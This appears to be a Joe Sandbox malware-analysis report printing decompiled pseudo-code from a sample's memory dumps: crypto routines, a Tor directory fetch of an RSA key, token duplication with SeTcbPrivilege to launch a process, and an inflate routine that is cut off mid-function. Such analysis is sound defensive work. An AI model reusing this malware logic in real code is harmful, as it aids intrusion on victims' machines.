    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 23%
    			E003DEF6B(void* _a4, int _a8, void* _a12, void* _a16, intOrPtr _a20, intOrPtr _a24) {
    				long* _v8;
    				void* _v12;
    				long* _v16;
    				int _v20;
    				signed int _t42;
    				void* _t48;
    				int _t51;
    				DWORD* _t67;
    				BYTE* _t71;
    				signed int _t78;
    				char _t82;
    				int _t84;
    				void* _t90;
    
    				_t78 = _a8;
    				_t42 = _t78 & 0x8000000f;
    				if(_t42 < 0) {
    					_t90 = (_t42 - 0x00000001 | 0xfffffff0) + 1;
    				}
    				if(_t90 != 0) {
    					L13:
    					return 0;
    				} else {
    					_t82 = 0x10;
    					if(_t78 < _t82) {
    						goto L13;
    					}
    					_v16 = 0;
    					if(CryptAcquireContextA( &_v16, 0, 0, 0x18, 0xf0000000) == 0) {
    						goto L13;
    					}
    					_t48 =  *0x3e8538(_t78 + _t78);
    					_v12 = _t48;
    					_t71 =  *0x3e8538(0x1c);
    					 *_t71 = 0x208;
    					_t71[4] = 0x660e;
    					_t71[8] = _t82;
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					_t51 = CryptImportKey(_v16, _t71, 0x1c, 0, 0,  &_v8);
    					if(_t51 == 0) {
    						L12:
    						CryptReleaseContext(_v16, 0);
    						 *0x3e8540(_v12);
    						 *0x3e8540(_t71);
    						goto L13;
    					}
    					__imp__CryptSetKeyParam(_v8, 1, _a20, 0);
    					if(_t51 == 0) {
    						L11:
    						CryptDestroyKey(_v8);
    						goto L12;
    					}
    					_t84 = _a8;
    					memcpy(_v12, _a4, _t84);
    					_v20 = _t84;
    					if(_a24 == 0) {
    						if(CryptDecrypt(_v8, 0, 1, 0, _v12,  &_v20) != 0) {
    							L16:
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							memcpy(_a12, _v12, _a8);
    							CryptDestroyKey(_v8);
    							CryptReleaseContext(_v16, 0);
    							 *0x3e8540(_v12);
    							 *0x3e8540(_t71);
    							return _v20;
    						}
    						goto L11;
    					}
    					_t67 =  &_v20;
    					__imp__CryptEncrypt(_v8, 0, 1, 0, _v12, _t67, _t84 + _t84);
    					if(_t67 == 0) {
    						goto L11;
    					}
    					goto L16;
    				}
    			}

    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000024,?,?,00000001,?,0000000F,00000010), ref: 003DEFA8
    • CryptImportKey.ADVAPI32(00000000,00000000,0000001C,00000000,00000000,00000010,00000010), ref: 003DEFF7
    • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 003DF00A
    • memcpy.MSVCRT ref: 003DF01E
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000000), ref: 003DF040
    • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 003DF05D
    • CryptDestroyKey.ADVAPI32(?), ref: 003DF06A
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003DF074
    • memcpy.MSVCRT ref: 003DF0AA
    • CryptDestroyKey.ADVAPI32(?), ref: 003DF0B5
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003DF0C0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 46%
    			E003D556B(void* __ecx, void* __edi, void* __eflags) {
    				char* _v8;
    				void* _v12;
    				void* _v16;
    				char _v20;
    				intOrPtr _v32;
    				char _v36;
    				char _v860;
    				void* __ebx;
    				void* __esi;
    				void* _t28;
    				char _t31;
    				void* _t33;
    				char _t40;
    				char* _t41;
    				char* _t48;
    				void* _t51;
    				void* _t62;
    				char* _t79;
    				void* _t86;
    
    				_t86 = __eflags;
    				_t28 = E003D3E45(__ecx);
    				E003D3E17( &_v860);
    				_t31 = L003DF529(_t86, _t28);
    				_pop(_t62);
    				_v860 = _t31;
    				_t87 = _t31;
    				if(_t31 == 0) {
    					L8:
    					return 0;
    				}
    				_t33 = E003D4054( &_v860, _t87);
    				_t88 = _t33;
    				if(_t33 == 0 || E003D3EE9( &_v860, _t62, _t88) == 0) {
    					L7:
    					E003DFF10(_v860);
    					goto L8;
    				} else {
    					_v20 = 0x10;
    					__imp__#5( *_v860,  &_v36,  &_v20);
    					_t40 =  *0x3e8538(0x200);
    					_v12 = _t40;
    					_t41 =  *0x3e8538(0x1000);
    					_v8 = _t41;
    					__imp__#12(_v32);
    					_t12 =  &_v12; // 0x3d5e6d
    					sprintf( *_t12, "GET /tor/micro/d/%s.z HTTP/1.0\r\nHost: %s\r\n\r\n", __edi + 0x2c, _t41);
    					if(E003D4BDF( &_v860, _v12, _v8, 0) == 0) {
    						L6:
    						 *0x3e8540(_v8);
    						 *0x3e8540(_v12);
    						goto L7;
    					}
    					_t48 = strstr(_v8, "-----BEGIN RSA PUBLIC KEY-----");
    					_v16 = _t48;
    					if(_t48 == 0) {
    						goto L6;
    					}
    					_t79 =  &((strstr( &(_t48[1]), "-----END RSA PUBLIC KEY-----"))[0x1c]);
    					if(_t79 != 0) {
    						_t51 =  *0x3e8538(0x1000);
    						 *(__edi + 0x6c) = _t51;
    						memset(_t51, 0, 0x1000);
    						memcpy( *(__edi + 0x6c), _v16, _t79 - _v16);
    						 *0x3e8540(_v8);
    						 *0x3e8540(_v12);
    						E003DFF10(_v860);
    						__eflags = 1;
    						return 1;
    					}
    					goto L6;
    				}
    			}

    APIs
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D40B3
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4122
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4165
      • Part of subcall function 003D4054: memset.MSVCRT ref: 003D41AC
      • Part of subcall function 003D4054: htonl.WS2_32(00000000), ref: 003D41C5
      • Part of subcall function 003D4054: getpeername.WS2_32(?,?,?), ref: 003D41EA
      • Part of subcall function 003D4054: memset.MSVCRT ref: 003D4226
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4233
    • getpeername.WS2_32(?,?,?), ref: 003D55D6
    • inet_ntoa.WS2_32(?), ref: 003D55FE
    • sprintf.MSVCRT ref: 003D5611
      • Part of subcall function 003D4BDF: memset.MSVCRT ref: 003D4C2D
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C61
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C80
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C90
      • Part of subcall function 003D4BDF: memset.MSVCRT ref: 003D4CA5
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4D4B
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4D68
      • Part of subcall function 003D4BDF: sscanf.MSVCRT ref: 003D4D70
    • strstr.MSVCRT ref: 003D5640
    • strstr.MSVCRT ref: 003D5652
      • Part of subcall function 003DFF10: closesocket.WS2_32(?), ref: 003DFF12
    • memset.MSVCRT ref: 003D568F
    • memcpy.MSVCRT ref: 003D56A1
      • Part of subcall function 003D3EE9: memset.MSVCRT ref: 003D3F19
      • Part of subcall function 003D3EE9: htons.WS2_32(00000000), ref: 003D3F31
      • Part of subcall function 003D3EE9: memset.MSVCRT ref: 003D3F7B
      • Part of subcall function 003D3EE9: htons.WS2_32(?), ref: 003D3FB2
    Strings
    • -----BEGIN RSA PUBLIC KEY-----, xrefs: 003D5638
    • -----END RSA PUBLIC KEY-----, xrefs: 003D564C
    • GET /tor/micro/d/%s.z HTTP/1.0Host: %s, xrefs: 003D5609
    • m^=, xrefs: 003D560E
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 69%
    			E003CC320(intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
    				void* _v8;
    				char _v12;
    				void* _v16;
    				void* _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				void* _v36;
    				short _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				intOrPtr* _v68;
    				intOrPtr* _v72;
    				intOrPtr* _v76;
    				intOrPtr* _v80;
    				intOrPtr* _v84;
    				char* _v88;
    				intOrPtr* _v92;
    				char _v96;
    				intOrPtr _v100;
    				char _v108;
    				char _v112;
    				char _v128;
    				char _v228;
    				short _v248;
    				char* _v288;
    				char _v296;
    				char _v496;
    				char _v1008;
    				void* _v1520;
    				intOrPtr _t122;
    				intOrPtr* _t125;
    				intOrPtr* _t126;
    				intOrPtr* _t127;
    				intOrPtr* _t128;
    				intOrPtr* _t129;
    				intOrPtr* _t130;
    				intOrPtr* _t131;
    				intOrPtr _t141;
    				intOrPtr* _t146;
    				intOrPtr _t147;
    				intOrPtr* _t148;
    				intOrPtr _t149;
    				intOrPtr* _t152;
    				intOrPtr* _t154;
    				intOrPtr _t157;
    				intOrPtr* _t158;
    				intOrPtr _t165;
    				intOrPtr* _t166;
    				intOrPtr* _t170;
    				long _t172;
    				intOrPtr* _t175;
    				signed int _t176;
    				intOrPtr* _t177;
    				intOrPtr* _t181;
    				_Unknown_base(*)()* _t199;
    				intOrPtr _t201;
    				intOrPtr _t205;
    				intOrPtr _t207;
    				intOrPtr _t211;
    				intOrPtr _t213;
    				char* _t214;
    				intOrPtr* _t226;
    				intOrPtr _t236;
    				intOrPtr _t237;
    				intOrPtr _t239;
    				intOrPtr _t251;
    				intOrPtr _t256;
    				intOrPtr* _t259;
    				intOrPtr _t260;
    				intOrPtr _t262;
    				intOrPtr _t263;
    				intOrPtr _t267;
    				signed int _t269;
    				signed int _t270;
    				intOrPtr* _t271;
    				struct HINSTANCE__* _t272;
    				void* _t273;
    				void* _t275;
    				_Unknown_base(*)()* _t279;
    
    				_t201 =  *0x3e8628; // 0x622508
    				_v8 = 0;
    				_v20 = 0;
    				_v24 = 0xffffffff;
    				_v28 = 0;
    				_v36 = 0;
    				_v16 = 0;
    				_v296 = 0x44;
    				_v40 = 0;
    				 *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xb8))))( &_v296);
    				_v64 = 0;
    				_v60 = 0;
    				_v56 = 0;
    				_v52 = 0;
    				_t279 =  *0x3e85c8; // 0x0
    				if(_t279 != 0) {
    					L4:
    					_t122 =  *0x3e8628; // 0x622508
    					_v44 = 0;
    					_t29 = _t122 + 0x150; // 0x622658
    					_t269 = _t29;
    					_t125 =  *((intOrPtr*)( *_t269))( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x100))))(0x28,  &_v16));
    					__eflags = _t125;
    					if(_t125 != 0) {
    						_t260 =  *0x3e8628; // 0x622508
    						_t181 =  *((intOrPtr*)( *((intOrPtr*)(_t260 + 0x188))))(0, L"SeTcbPrivilege",  &_v108);
    						__eflags = _t181;
    						if(_t181 != 0) {
    							_t262 =  *0x3e8628; // 0x622508
    							_v112 = 1;
    							_v100 = 2;
    							 *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x18c))))(_v16, 0,  &_v112, 0x10,  &_v128,  &_v44);
    						}
    					}
    					_t126 =  *0x3e85dc; // 0x0
    					_t270 = _t269 | 0xffffffff;
    					__eflags = _t126;
    					if(_t126 == 0) {
    						L18:
    						_t127 =  *0x3e85fc; // 0x0
    						__eflags = _t127;
    						if(_t127 == 0) {
    							goto L31;
    						} else {
    							_t270 =  *_t127();
    							__eflags = _t270 - 0xffffffff;
    							if(_t270 == 0xffffffff) {
    								goto L31;
    							} else {
    								goto L20;
    							}
    						}
    					} else {
    						_t175 =  *_t126(0, 0, 1,  &_v28,  &_v36);
    						__eflags = _t175;
    						if(_t175 == 0) {
    							goto L18;
    						} else {
    							_t259 = _v36;
    							_t267 = _v28;
    							_t176 = 0;
    							__eflags = _t259;
    							if(_t259 > 0) {
    								_t226 = _t267 + 8;
    								while(1) {
    									__eflags =  *_t226;
    									if( *_t226 == 0) {
    										_t270 =  *(_t267 + (_t176 + _t176 * 2) * 4);
    										goto L15;
    									}
    									_t176 = _t176 + 1;
    									_t226 = _t226 + 0xc;
    									__eflags = _t176 - _t259;
    									if(_t176 < _t259) {
    										continue;
    									} else {
    									}
    									goto L15;
    								}
    							}
    							L15:
    							_t177 =  *0x3e85f8; // 0x0
    							__eflags = _t177;
    							if(_t177 != 0) {
    								 *_t177(_t267);
    							}
    							__eflags = _t270 - 0xffffffff;
    							if(_t270 != 0xffffffff) {
    								L20:
    								_t207 =  *0x3e8628; // 0x622508
    								 *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x190))))();
    								_t146 =  *0x3e85c8(_t270,  &_v24);
    								__eflags = _t146;
    								if(_t146 == 0) {
    									L31:
    									_t271 = _v48;
    								} else {
    									_t147 =  *0x3e8628; // 0x622508
    									_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x144))))(_v24, 0x2000000, 0, 1, 1,  &_v8);
    									__eflags = _t148;
    									if(_t148 == 0) {
    										goto L31;
    									} else {
    										_t149 =  *0x3e8628; // 0x622508
    										 *((intOrPtr*)( *((intOrPtr*)(_t149 + 0xf8))))(_v24);
    										_t211 =  *0x3e8628; // 0x622508
    										_v12 = 0;
    										_t271 = 0;
    										_t152 =  *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x13c))))(_v8, 1, 0, 0,  &_v12);
    										__eflags = _t152;
    										if(_t152 != 0) {
    											L25:
    											_t213 =  *0x3e8628; // 0x622508
    											_t154 =  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x13c))))(_v8, 1, _t271, _v12,  &_v12);
    											__eflags = _t154;
    											if(_t154 != 0) {
    												_t214 =  &_v32;
    												_t157 =  *0x3e8628; // 0x622508
    												_v32 = 0x100;
    												_v1008 = 0;
    												_v1520 = 0;
    												_t158 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x140))))(0,  *_t271,  &_v1008, _t214,  &_v1520, _t214,  &_v48);
    												__eflags = _t158;
    												if(_t158 != 0) {
    													_v96 = 0;
    													_v88 = 0;
    													_v92 = 0;
    													_v84 = 0;
    													_v80 = 0;
    													_v76 = 0;
    													_v72 = 0;
    													_v68 = 0;
    													_v88 =  &_v1008;
    													_t251 =  *0x3e8628; // 0x622508
    													_v96 = 0x20;
    													_t85 = _t251 + 0x200; // 0x75501aac
    													__eflags =  *((intOrPtr*)( *_t85))(_v8,  &_v96);
    													if(__eflags != 0) {
    														_v248 = 0;
    														E003C9090(__eflags,  &_v496, 0x9c);
    														_t273 = _t273 + 8;
    														_v288 =  &_v496;
    														_t165 =  *0x3e8628; // 0x622508
    														_t91 = _t165 + 0x1f8; // 0x75501a7a
    														_t166 =  *((intOrPtr*)( *_t91))( &_v20, _v8, 0);
    														__eflags = _t166;
    														if(_t166 != 0) {
    															_t256 =  *0x3e8628; // 0x622508
    															_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x148))))(_v8, 0, _a12, 0, 0, 0, _a16, _v20, 0,  &_v296,  &_v64);
    															__eflags = _t170;
    															if(_t170 != 0) {
    																 *_a4 = _v64;
    																 *_a8 = _v60;
    																_v40 = 1;
    															}
    														}
    													}
    												}
    											}
    										} else {
    											_t172 = GetLastError();
    											__eflags = _t172 - 0x7a;
    											if(_t172 == 0x7a) {
    												_t271 = E003D1D90(_v12, 0);
    												_t273 = _t273 + 8;
    												__eflags = _t271;
    												if(_t271 != 0) {
    													goto L25;
    												}
    											}
    										}
    									}
    								}
    							} else {
    								goto L18;
    							}
    						}
    					}
    					_t128 = _v68;
    					__eflags = _t128;
    					if(_t128 != 0) {
    						_t141 =  *0x3e8628; // 0x622508
    						_t108 = _t141 + 0x204; // 0x75503e6f
    						 *((intOrPtr*)( *_t108))(_v8, _t128);
    					}
    					_t129 = _v8;
    					__eflags = _t129;
    					if(_t129 != 0) {
    						_t239 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t239 + 0xf8))))(_t129);
    					}
    					_t130 = _v20;
    					__eflags = _t130;
    					if(_t130 != 0) {
    						_t205 =  *0x3e8628; // 0x622508
    						_t112 = _t205 + 0x1fc; // 0x75501a4e
    						 *((intOrPtr*)( *_t112))(_t130);
    					}
    					__eflags = _t271;
    					if(_t271 != 0) {
    						E003CBB40(_t271);
    					}
    					_t131 = _v16;
    					__eflags = _t131;
    					if(_t131 != 0) {
    						_t236 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x18c))))(_t131, 0,  &_v128, 0x10, 0, 0);
    						_t237 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t237 + 0xf8))))(_v16);
    					}
    					return _v40;
    				} else {
    					E003C6CB0( &_v228, 0x97);
    					_t263 =  *0x3e8628; // 0x622508
    					_t275 = _t273 + 8;
    					_t272 =  *((intOrPtr*)( *((intOrPtr*)(_t263 + 0x48))))( &_v228);
    					if(_t272 == 0) {
    						L3:
    						return 0;
    					} else {
    						E003C6CB0( &_v228, 0x98);
    						 *0x3e85dc = GetProcAddress(_t272,  &_v228);
    						E003C6CB0( &_v228, 0x99);
    						 *0x3e85f8 = GetProcAddress(_t272,  &_v228);
    						E003C6CB0( &_v228, 0x9a);
    						 *0x3e85fc = GetProcAddress(_t272,  &_v228);
    						E003C6CB0( &_v228, 0x9b);
    						_t273 = _t275 + 0x20;
    						_t199 = GetProcAddress(_t272,  &_v228);
    						 *0x3e85c8 = _t199;
    						if(_t199 != 0) {
    							goto L4;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CC3D2
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CC3F5
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CC418
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CC43B
    • GetLastError.KERNEL32 ref: 003CC5AB
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 99%
    			E003D257B(int* __esi, signed int _a4, signed int* _a8, intOrPtr _a12, signed int _a16, signed int _a20, signed int _a24) {
    				void* _v8;
    				unsigned int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed char* _v24;
    				void* _v28;
    				signed int _v32;
    				signed char _v36;
    				signed int _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				signed int _v52;
    				int _v56;
    				signed int _v60;
    				intOrPtr _v124;
    				intOrPtr _v128;
    				void _v192;
    				void* _t811;
    				signed int _t812;
    				signed int* _t815;
    				void* _t816;
    				signed int _t821;
    				signed int _t822;
    				signed int _t831;
    				void* _t834;
    				signed int _t835;
    				void* _t841;
    				void* _t842;
    				signed int _t843;
    				signed int _t844;
    				signed int _t845;
    				signed int _t847;
    				signed int _t850;
    				signed int _t851;
    				signed int _t852;
    				signed int* _t854;
    				signed int _t858;
    				unsigned int _t861;
    				signed int _t862;
    				signed int _t867;
    				signed int _t871;
    				signed int _t875;
    				int _t880;
    				signed int _t884;
    				signed int _t896;
    				signed int _t900;
    				void* _t902;
    				signed int _t905;
    				void* _t908;
    				signed int _t912;
    				int _t916;
    				intOrPtr* _t919;
    				char* _t922;
    				signed int _t926;
    				signed char* _t933;
    				signed int _t937;
    				signed int _t940;
    				signed int _t941;
    				signed int _t943;
    				signed int _t951;
    				signed int _t952;
    				char* _t953;
    				signed char* _t955;
    				signed int _t959;
    				signed int _t962;
    				signed int _t963;
    				signed int _t965;
    				signed int _t968;
    				signed int _t972;
    				signed int _t988;
    				void* _t989;
    				int _t992;
    				signed int _t1002;
    				signed int _t1004;
    				int _t1005;
    				signed int _t1012;
    				signed int _t1013;
    				signed char* _t1014;
    				signed int _t1018;
    				signed int _t1021;
    				signed int _t1022;
    				signed int _t1024;
    				signed int _t1025;
    				signed int _t1026;
    				signed int _t1027;
    				signed int _t1030;
    				signed int _t1043;
    				signed int _t1044;
    				signed int _t1045;
    				signed int _t1053;
    				signed int _t1055;
    				signed int _t1056;
    				signed int _t1058;
    				signed int _t1059;
    				signed int _t1060;
    				signed int _t1062;
    				signed int _t1063;
    				signed int _t1065;
    				signed int _t1066;
    				signed int _t1067;
    				signed int _t1068;
    				void* _t1090;
    				signed int _t1091;
    				signed int _t1093;
    				void* _t1104;
    				signed int _t1105;
    				signed int* _t1107;
    				signed int _t1108;
    				void* _t1112;
    				void* _t1113;
    				signed int _t1117;
    				signed int _t1118;
    				signed int _t1119;
    				signed char* _t1122;
    				signed char _t1131;
    				signed char _t1144;
    				void* _t1150;
    				intOrPtr _t1151;
    				signed char _t1157;
    				signed char _t1163;
    				signed int _t1168;
    				signed int* _t1175;
    				short* _t1176;
    				signed char _t1177;
    				signed char _t1178;
    				signed int _t1180;
    				signed int _t1182;
    				signed char _t1186;
    				signed char _t1187;
    				signed int _t1190;
    				intOrPtr* _t1191;
    				signed int _t1200;
    				signed char _t1207;
    				signed char _t1212;
    				int _t1222;
    				signed char* _t1226;
    				signed char* _t1228;
    				signed char* _t1230;
    				signed char* _t1232;
    				signed char* _t1234;
    				signed char* _t1243;
    				char* _t1297;
    				intOrPtr _t1298;
    				signed int _t1299;
    				intOrPtr* _t1312;
    				signed int _t1313;
    				signed int _t1316;
    				signed int _t1318;
    				signed char* _t1336;
    				signed int _t1337;
    				int _t1338;
    				void* _t1340;
    				void* _t1341;
    				void* _t1342;
    				void* _t1343;
    				void* _t1344;
    				void* _t1345;
    				void* _t1346;
    				signed int _t1347;
    				signed int _t1348;
    				signed int _t1357;
    				signed int _t1358;
    				char* _t1359;
    				char* _t1362;
    				signed int _t1366;
    				void* _t1368;
    				signed int _t1369;
    				int _t1375;
    				int _t1379;
    				int* _t1381;
    				void* _t1382;
    				void* _t1383;
    				void* _t1389;
    				void* _t1390;
    
    				_t1381 = __esi;
    				_t1243 = _a4;
    				_v20 = _v20 | 0xffffffff;
    				_t1090 = _a16;
    				_t811 =  *_a20;
    				_v48 = _t811 + _t1090;
    				_t1336 =  &(_t1243[ *_a8]);
    				_t1117 = _a24 & 0x00000004;
    				_v8 = _t1243;
    				_v24 = _t1336;
    				_v28 = _t1090;
    				_v44 = _t1117;
    				if(_t1117 == 0) {
    					_t812 = _t811 - _a12;
    					__eflags = _t812;
    					_t16 = _t1090 - 1; // 0xfe
    					_t1118 = _t812 + _t16;
    				} else {
    					_t1118 = _t1117 | 0xffffffff;
    				}
    				_t17 = _t1118 + 1; // 0xff
    				_v60 = _t1118;
    				if((_t1118 & _t17) != 0 || _t1090 < _a12) {
    					 *_a20 =  *_a20 & 0x00000000;
    					_t815 = _a8;
    					 *_t815 =  *_t815 & 0x00000000;
    					__eflags =  *_t815;
    					_t816 = 0xfffffffd;
    					return _t816;
    				} else {
    					_t1091 = _t1381[1];
    					_t1119 = _t1381[8];
    					_v12 = _t1381[0xe];
    					_v16 = _t1381[9];
    					_v36 = _t1381[0xa];
    					_v56 = _t1381[0xf];
    					_t821 =  *_t1381;
    					_v32 = _t1091;
    					_v40 = _t1119;
    					_t1389 = _t821 - 0x18;
    					if(_t1389 > 0) {
    						__eflags = _t821 - 0x26;
    						if(__eflags > 0) {
    							_t822 = _t821 - 0x27;
    							__eflags = _t822;
    							if(_t822 == 0) {
    								L394:
    								 *_t1381 = 0x27;
    								L395:
    								_v20 = _v20 | 0xffffffff;
    								L396:
    								_t1381[0xe] = _v12;
    								_t1381[8] = _v40;
    								_t1381[9] = _v16;
    								_t1381[0xa] = _v36;
    								_t1381[0xf] = _v56;
    								_t1381[1] = _t1091;
    								 *_a8 = _v8 - _a4;
    								_t831 = _v28 - _a16;
    								 *_a20 = _t831;
    								if((_a24 & 0x00000009) == 0 || _v20 < 0) {
    									L410:
    									return _v20;
    								} else {
    									_t1122 = _a16;
    									_a16 = _t1381[7] & 0x0000ffff;
    									_a20 = _t831;
    									_t1337 = _t1381[7] & 0x0000ffff;
    									_t1093 = _a16;
    									_a4 = _t831 % 0x15b0;
    									if(_a20 == 0) {
    										L406:
    										_t1338 = _t1337 + (_t1093 << 0x10);
    										_t1381[7] = _t1338;
    										if(_v20 == 0 && (_a24 & 0x00000001) != 0 && _t1338 != _t1381[4]) {
    											_v20 = 0xfffffffe;
    										}
    										goto L410;
    									} else {
    										goto L399;
    									}
    									do {
    										L399:
    										_a16 = _a16 & 0x00000000;
    										_t834 = 7;
    										if(_a4 <= _t834) {
    											L402:
    											_t835 = _a4;
    											if(_a16 >= _t835) {
    												goto L405;
    											}
    											_t841 = _t835 - _a16;
    											do {
    												_t1337 = _t1337 + ( *_t1122 & 0x000000ff);
    												_t1122 =  &(_t1122[1]);
    												_t1093 = _t1093 + _t1337;
    												_t841 = _t841 - 1;
    											} while (_t841 != 0);
    											goto L405;
    										}
    										_t842 = _t834 - _t1122;
    										do {
    											_t1340 = _t1337 + ( *_t1122 & 0x000000ff);
    											_t1341 = _t1340 + (_t1122[1] & 0x000000ff);
    											_t1342 = _t1341 + (_t1122[2] & 0x000000ff);
    											_t1343 = _t1342 + (_t1122[3] & 0x000000ff);
    											_a16 = _a16 + 8;
    											_t1344 = _t1343 + (_t1122[4] & 0x000000ff);
    											_t1345 = _t1344 + (_t1122[5] & 0x000000ff);
    											_t1346 = _t1345 + (_t1122[6] & 0x000000ff);
    											_t1337 = _t1346 + (_t1122[7] & 0x000000ff);
    											_t1122 =  &(_t1122[8]);
    											_t1093 = _t1093 + _t1340 + _t1341 + _t1342 + _t1343 + _t1344 + _t1345 + _t1346 + _t1337;
    										} while ( &(_t1122[_t842]) < _a4);
    										goto L402;
    										L405:
    										_t1337 = _t1337 % 0xfff1;
    										_t796 =  &_a20;
    										 *_t796 = _a20 - _a4;
    										_a4 = 0x15b0;
    										_t1093 = _t1093 % 0xfff1;
    									} while ( *_t796 != 0);
    									goto L406;
    								}
    							}
    							_t843 = _t822 - 1;
    							__eflags = _t843;
    							if(_t843 == 0) {
    								L393:
    								 *_t1381 = 0x28;
    								goto L395;
    							}
    							_t844 = _t843 - 1;
    							__eflags = _t844;
    							if(_t844 == 0) {
    								__eflags = _t1243 - _t1336;
    								if(_t1243 >= _t1336) {
    									L376:
    									__eflags = _a24 & 0x00000002;
    									if((_a24 & 0x00000002) != 0) {
    										_v20 = 1;
    										 *_t1381 = 0x29;
    										goto L396;
    									}
    									_t845 = 0;
    									__eflags = 0;
    									L378:
    									_v12 = _v12 | _t845 << _t1091;
    									_t1091 = _t1091 + 8;
    									__eflags = _t1091;
    									L379:
    									__eflags = _t1091 - 8;
    									if(_t1091 >= 8) {
    										_t847 = _v12 & 0x000000ff;
    										_v12 = _v12 >> 8;
    										_t1091 = _t1091 - 8;
    										__eflags = _t1091;
    										L383:
    										_t720 =  &_v16;
    										 *_t720 = _v16 + 1;
    										__eflags =  *_t720;
    										_t1381[4] = _t1381[4] << 0x00000008 | _t847;
    										L384:
    										__eflags = _v16 - 4;
    										if(_v16 >= 4) {
    											L392:
    											_v20 = _v20 & 0x00000000;
    											 *_t1381 = 0x22;
    											goto L396;
    										}
    										__eflags = _t1091;
    										if(_t1091 != 0) {
    											goto L379;
    										}
    										__eflags = _v8 - _t1336;
    										if(_v8 < _t1336) {
    											_t847 =  *_v8 & 0x000000ff;
    											_v8 = _v8 + 1;
    											goto L383;
    										}
